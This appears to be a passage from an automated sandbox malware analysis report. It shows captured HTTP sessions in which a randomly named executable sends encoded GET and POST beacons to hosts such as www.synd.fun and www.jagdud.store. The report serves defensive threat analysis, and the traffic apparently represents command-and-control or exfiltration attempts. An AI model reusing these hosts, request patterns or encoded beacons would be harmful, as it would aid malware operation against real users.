                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 33 67 75 70 4a 4a 6c 78 71 33 6e 69 65 4f 67 4d 6d 51 75 37 53 6b 64 38 69 77 35 36 76 49 55 4b 70 62 63 37 67 7a 75 64 75 6c 79 57 47 74 67 48 69 6d 54 37 74 56 76 56 32 71 36 32 39 59 54 6d 53 43 63 74 73 58 72 63 5a 4f 67 66 53 54 58 54 37 48 37 7a 56 39 48 68 33 73 47 69 62 39 71 69 79 65 49 53 6e 5a 57 71 59 62 51 72 45 4e 63 6b 61 57 53 41 71 4a 43 6c 41 42 6e 59 61 50 7a 57 38 4f 6e 75 34 69 78 2f 38 2b 73 4e 55 37 32 68 6e 6a 30 50 6c 58 6d 77 48 53 75 55 4a 4e 56 48 31 6a 2f 37 71 58 30 4a 2f 2f 64 30 4e 58 41 66 46 6f 65 37 64 67 47 45 50 32 72 30 2f 72 73 30 2f 33 35 4f 66 74 35 48 45 2b 38 34 35 62 50 2b 78 42 31 4d 69 35 43 6f 36 38 54 35 7a 39 47 61 79 45 2b 62 4a 38 73 62 59 6b 54 4b 41 65 49 31 50 61 6b 47 6b 77 31 75 37 4c 33 4d 55 63 62 33 75 77 55 51 35 76 73 55 69 4d 4a 65 2f 63 49 6d 68 51 56 2b 68 6c 5a 4d 2b 68 7a 66 74 64 4c 6a 56 48 4c 36 68 59 6e 37 6c 34 57 41 4a 2b 4a 46 6c 33 2f 50 42 77 66 2f 6d 45 68 4a 34 45 44 45 61 6a 76 58 6b 36 67 56 2f 6d [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=3gupJJlxq3nieOgMmQu7Skd8iw56vIUKpbc7gzudulyWGtgHimT7tVvV2q629YTmSCctsXrcZOgfSTXT7H7zV9Hh3sGib9qiyeISnZWqYbQrENckaWSAqJClABnYaPzW8Onu4ix/8+sNU72hnj0PlXmwHSuUJNVH1j/7qX0J//d0NXAfFoe7dgGEP2r0/rs0/35Oft5HE+845bP+xB1Mi5Co68T5z9GayE+bJ8sbYkTKAeI1PakGkw1u7L3MUcb3uwUQ5vsUiMJe/cImhQV+hlZM+hzftdLjVHL6hYn7l4WAJ+JFl3/PBwf/mEhJ4EDEajvXk6gV/mfXL2dI14LROz1j0miog6xDj4N3UQjeOEBkW2h0cn3srwGIAITRfzExZrYxbjQVVdEsI2zQJJxg4tnj+xz2/Bfpj8QdOCfzY1yeekt29I1eVj17qPpR8G80eYLXrw9P4/KcN1GhNPcNDyLFdZEgX1RZZhwyVFMYlNWhcDleX2nZMzX1S5lu90u0baX7sSdRAyIua15d0FpJqNMEUkPEe+tHnLd485kUksZzHuMDTTU18WHfdT83Q8xCnnr89/TB0Kny/wPxBgY3fUbmcTRsDp1znAkp7wPWnMl4LZeaLk7pSHQRIexNBUZrBd00FxxtyN7hMZ6VUbRIgTqmR9UTY5gsd7ctLrLkHY7wA/0DkoaqlZVIXO6bhEj/6/FFZk6W247qFVubknJ4p+Ht8D379V9tDjoSQp9+mAEJxNtIjNfKXoe7WNrsD0hc4gzA4dWZJNCyQrAYo13+PiD/bpCahQZAHfNy9vMSqLx5Q1aTih/yNFSgDR++66hqIeL85ekDO9QMijliDUsTboV3jpEO7TDqkollsxuqctfti0v7sk32/9Qy8aNr1lLhYyuXPceKsUi5t4DDq0cl0RECJyTD7oMQO9oNUOP6D+5tENX7v+vsMSJjmMWz2AAhr+u9sBb3agKjQXq1JqdMr9fQrMh1NkyQ4zBoCpDbI0S8 [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:25.323488951 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:25 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 [TRUNCATED]
                                                                                                        Data Ascii: d93Z[o~H()"&qK9-E!r]Jm4bh@7}* _((a3!E(9s.9gf;J2%/n&*_F)0FN>PnOFJ.:>n@5JC[n$*HuO(1zUyxbWkcoEF)N{J@u<(I/^&)Kv='l[_-4]\x`7L7.v3]/vIeG4xv/*k{k3[[3NdD(-&S);x*NqZxEajbsmLBFQ}fT0HO2;GGi;sn[CJY)NZn@TdVA$gZ4;V&R`(}E]?Gx>Qz7+A;_Ymn$Ngm3vp`%xZT{Q_iu{f}4sV+pk7!foo/X-0NVsUgdmeVPj>\>E]GvLH8#GIq.gPUK&uUg%d,rBtO3oq^Sn`0U|iBR74,O$G1f6}t@`YpANd49^&^7hLiLCOz &GO'7Ez?C,aB)YP`+X2c`GW"#<]=[)[lSoph"sk0 [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:25.323520899 CET1236INData Raw: b6 ea 54 fd 06 90 fa d6 00 fe eb 05 2d 5f 6d 27 96 f6 65 2c 98 44 61 d0 7d b2 52 80 ba 30 77 97 82 d6 3f 61 bd 88 50 10 ef e3 f4 1e ec 8c 29 cc e0 ea bc d3 6a e1 c4 a3 b6 56 79 c1 49 3b 04 c2 0d 10 13 03 05 ba df 22 d2 dd 9f fc 01 2e f2 78 f2 45
                                                                                                        Data Ascii: T-_m'e,Da}R0w?aP)jVyI;".xE(03{5*RXLFtw9~IKp|Bnd;-He2TzYx<|"EO+9:70Z`y[(I6<6Ab#D&k@j
                                                                                                        Dec 2, 2024 14:38:25.323528051 CET1189INData Raw: 7d e9 84 6c 69 dd 4b 9d 79 cd 2b e7 d2 6e ae f0 01 aa b1 1d b5 5d 9c 22 3b 38 6f cf cf 9a 8b 3a 58 1f 3a 1f 3b 3b fe 96 44 4c c2 82 98 20 37 3a f2 7c 44 1a 66 35 a1 66 a7 e8 bc b4 36 3d 89 29 3e ab d3 ec 00 95 7b 01 8e 39 bb e3 16 9d b7 91 09 03
                                                                                                        Data Ascii: }liKy+n]";8o:X:;;DL 7:|Df5f6=)>{9G'r@)"Ct(UWv!>ml2OOyupqEk)^;%-*m]3bvNZ{f~Niu`E)G\h|0z+,:qFhx


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.649932194.58.112.174802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:26.676837921 CET545OUTGET /6sgf/?aNXP_jw=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXRZ3rjMrHC/Gv/9ocmuyHMrUIRIkrN1ClkKvdCmOBXovMxeC3un8=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.synd.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:28.045411110 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Data Raw: 32 36 35 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 79 6e 64 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 [TRUNCATED]
                                                                                                        Data Ascii: 2652<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.synd.fun</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" rel= [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:28.045439959 CET224INData Raw: 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74
                                                                                                        Data Ascii: lass="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.synd.fun</h1><p class="b-parking_
                                                                                                        Dec 2, 2024 14:38:28.045445919 CET1236INData Raw: 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 62 72 3e d0 b8 26 6e 62 73 70 3b d0
                                                                                                        Data Ascii: _header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_normal b-parking__
                                                                                                        Dec 2, 2024 14:38:28.045483112 CET1236INData Raw: 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f
                                                                                                        Data Ascii: span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;</p></div></div><ul class="
                                                                                                        Dec 2, 2024 14:38:28.045535088 CET1236INData Raw: 6f 75 72 63 65 3d 77 77 77 2e 73 79 6e 64 2e 66 75 6e 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 68 6f 73 74 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b
                                                                                                        Data Ascii: ource=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<span class="char-rouble-native">&#8381;</
                                                                                                        Dec 2, 2024 14:38:28.045542002 CET1236INData Raw: 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 88 d0 b0 d0 b1 d0 bb d0 be d0 bd d1 8b 20 d1 81 26 6e 62 73 70 3b d0 be d1 82
                                                                                                        Data Ascii: s="b-text b-parking__promo-description"> &nbsp; &nbsp; </p><a class="b-button b-button_color_reference b-button_style_block b-button_size_m
                                                                                                        Dec 2, 2024 14:38:28.045548916 CET1236INData Raw: b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b8 26 6e 62 73 70 3b d0 be d0 b1 d0 b5 d0 b7 d0 be d0 bf d0 b0 d1 81 d1 8c d1 82 d0 b5 20 d0 b2 d0 b0 d1 88 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 20 d0 be d1 82 26 6e 62 73 70 3b d0 b7 d0
                                                                                                        Data Ascii: &nbsp; &nbsp;! , &nbsp; &nbsp;
                                                                                                        Dec 2, 2024 14:38:28.045686007 CET1236INData Raw: 3d 20 30 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 2b 20 27 26 27 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: = 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href
                                                                                                        Dec 2, 2024 14:38:28.045696974 CET1097INData Raw: 65 2e 6d 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: e.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) {


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.649948209.74.64.187802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:33.610939026 CET807OUTPOST /ohf8/ HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.jagdud.store
                                                                                                        Referer: http://www.jagdud.store/ohf8/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 57 31 43 42 6f 54 68 4a 65 74 39 4c 52 4b 6f 37 48 76 43 4b 37 4c 54 63 2f 38 76 4d 4d 52 71 49 7a 34 68 4c 39 2b 39 61 76 56 49 45 73 67 42 6c 75 6c 2b 6f 39 6e 59 35 4b 6a 4a 66 6b 49 69 6c 77 38 74 39 53 49 6f 2b 42 4b 6f 57 31 30 4d 68 41 6a 4e 6a 5a 47 35 74 43 67 34 71 7a 65 52 6d 73 6c 37 71 45 56 71 71 65 71 7a 51 79 66 36 50 76 6a 57 77 2f 58 4e 5a 6d 30 76 57 6e 56 38 77 2f 55 44 37 73 79 63 49 6d 63 4a 77 42 52 72 62 34 61 62 73 69 78 4f 71 33 73 50 73 34 46 63 39 73 73 77 4c 4f 64 4b 36 73 39 30 70 48 66 42 70 7a 53 66 36 62 44 37 54 53 76 66 65 72 4f 54 51
                                                                                                        Data Ascii: aNXP_jw=onR9AvgxrVBHW1CBoThJet9LRKo7HvCK7LTc/8vMMRqIz4hL9+9avVIEsgBlul+o9nY5KjJfkIilw8t9SIo+BKoW10MhAjNjZG5tCg4qzeRmsl7qEVqqeqzQyf6PvjWw/XNZm0vWnV8w/UD7sycImcJwBRrb4absixOq3sPs4Fc9sswLOdK6s90pHfBpzSf6bD7TSvferOTQ
                                                                                                        Dec 2, 2024 14:38:34.909288883 CET533INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:34 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.649956209.74.64.187802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:36.276108027 CET831OUTPOST /ohf8/ HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.jagdud.store
                                                                                                        Referer: http://www.jagdud.store/ohf8/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 56 56 79 42 76 77 4a 4a 53 64 39 4b 64 71 6f 37 64 66 44 42 37 4c 66 63 2f 2f 6a 6d 4d 69 4f 49 7a 5a 78 4c 76 71 52 61 2f 46 49 45 34 51 42 73 67 46 2b 76 39 6e 63 48 4b 6d 78 66 6b 49 6d 6c 77 39 64 39 53 62 77 39 44 61 6f 59 30 45 4d 6a 64 7a 4e 6a 5a 47 35 74 43 67 63 51 7a 61 31 6d 72 55 4c 71 45 77 4b 70 64 71 7a 58 6d 50 36 50 72 6a 58 35 2f 58 4e 2f 6d 31 7a 77 6e 54 77 77 2f 56 7a 37 73 67 30 4c 73 63 4a 79 50 78 71 74 2b 71 32 45 6b 51 33 59 2f 4d 2f 62 6b 6d 74 64 74 61 74 52 53 75 4b 5a 2b 74 55 72 48 64 5a 62 7a 79 66 51 5a 44 44 54 41 34 54 35 6b 36 32 7a 65 36 6e 76 32 6d 59 4c 69 7a 4c 7a 69 7a 6e 6f 45 56 2b 61 73 67 3d 3d
                                                                                                        Data Ascii: aNXP_jw=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiOIzZxLvqRa/FIE4QBsgF+v9ncHKmxfkImlw9d9Sbw9DaoY0EMjdzNjZG5tCgcQza1mrULqEwKpdqzXmP6PrjX5/XN/m1zwnTww/Vz7sg0LscJyPxqt+q2EkQ3Y/M/bkmtdtatRSuKZ+tUrHdZbzyfQZDDTA4T5k62ze6nv2mYLizLziznoEV+asg==
                                                                                                        Dec 2, 2024 14:38:37.534991980 CET533INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:37 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.649962209.74.64.187802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:38.949639082 CET1844OUTPOST /ohf8/ HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.jagdud.store
                                                                                                        Referer: http://www.jagdud.store/ohf8/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 6f 6e 52 39 41 76 67 78 72 56 42 48 56 56 79 42 76 77 4a 4a 53 64 39 4b 64 71 6f 37 64 66 44 42 37 4c 66 63 2f 2f 6a 6d 4d 69 47 49 7a 70 74 4c 39 62 52 61 38 46 49 45 6b 41 42 70 67 46 2f 7a 39 6e 6b 4c 4b 6d 4d 6f 6b 4e 36 6c 78 66 6c 39 44 36 77 39 4b 61 6f 59 78 30 4d 67 41 6a 4e 32 5a 47 70 70 43 67 73 51 7a 61 31 6d 72 57 54 71 4e 46 71 70 62 71 7a 51 79 66 36 4c 76 6a 58 56 2f 58 55 4b 6d 31 48 47 6e 6a 51 77 2b 31 6a 37 2f 44 63 4c 67 63 4a 30 61 78 71 6c 2b 71 36 62 6b 52 61 70 2f 4f 65 4f 6b 6c 78 64 73 65 67 39 42 4f 2b 45 67 62 41 39 51 66 59 39 79 30 54 4f 51 42 7a 7a 45 2f 7a 35 6b 4c 37 62 59 63 33 62 32 48 5a 51 72 51 54 37 68 6c 62 2b 4e 6b 2f 31 35 34 42 47 79 45 41 68 4c 54 39 34 57 69 6d 44 70 78 6f 32 73 39 74 71 69 7a 61 59 64 52 62 4e 39 44 79 70 4a 44 7a 6c 6d 59 65 69 41 59 73 50 7a 2b 65 2f 56 78 6b 4f 36 63 39 38 6e 51 54 37 63 64 41 56 6e 49 49 50 73 37 77 58 62 42 46 67 45 45 77 64 66 41 6e 63 7a 74 54 4f 49 71 49 73 36 70 70 6e 76 44 52 2b 79 59 [TRUNCATED]
